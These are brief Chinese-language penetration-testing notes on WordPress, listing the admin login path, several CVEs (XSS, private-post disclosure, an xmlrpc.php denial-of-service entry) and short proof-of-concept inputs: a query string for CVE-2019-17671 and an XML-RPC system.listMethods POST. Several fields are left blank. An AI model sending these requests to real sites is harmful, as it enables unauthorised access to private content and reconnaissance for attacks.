简介
后台:
/wp-login.php
CVE-2019-16773
Date 2019.3 类型 XSS 影响范围 WordPress 3.7版本至5.3.0版本 前置条件 (1)登录/wp-login.php
CVE-2019-17671
Date 2019 类型 越权 影响范围
WordPress <= 5.2.3
前置条件 (1)有搜索功能 (2)有私密页面(不允许非管理员用户访问) 复现 poc | EXP /?static=1&order=asc
CVE-2014-8877
Date 2014 类型 影响范围
xmlrpc.php
Date 类型 DOS 影响范围
复现
POC
POST /xmlrpc.php
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>